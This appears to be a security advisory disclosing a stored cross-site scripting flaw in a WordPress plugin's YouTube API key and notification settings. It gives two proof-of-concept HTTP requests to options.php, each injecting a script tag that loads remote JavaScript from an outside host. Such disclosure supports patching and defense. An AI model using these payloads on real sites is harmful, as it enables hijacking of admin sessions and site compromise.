The plugin did not sanitise or escape its lyte_yt_api_key and lyte_notification settings before outputting them back in the page, allowing high privilege users to set XSS payload on them and leading to stored Cross-Site Scripting issues.
PoC #1 | Authenticated Persistent XSS | Your YouTube API key: POST /wp-admin/options.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 940 option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=&lyte_yt_api_key=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0 PoC #2 | Authenticated Persistent XSS | &lyte_notification: POST /wp-admin/options.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 940 option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_yt_api_key=&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0
m0ze
m0ze
Yes
2021-06-16 (about 1 years ago)
2021-06-16 (about 1 years ago)
2021-06-25 (about 1 years ago)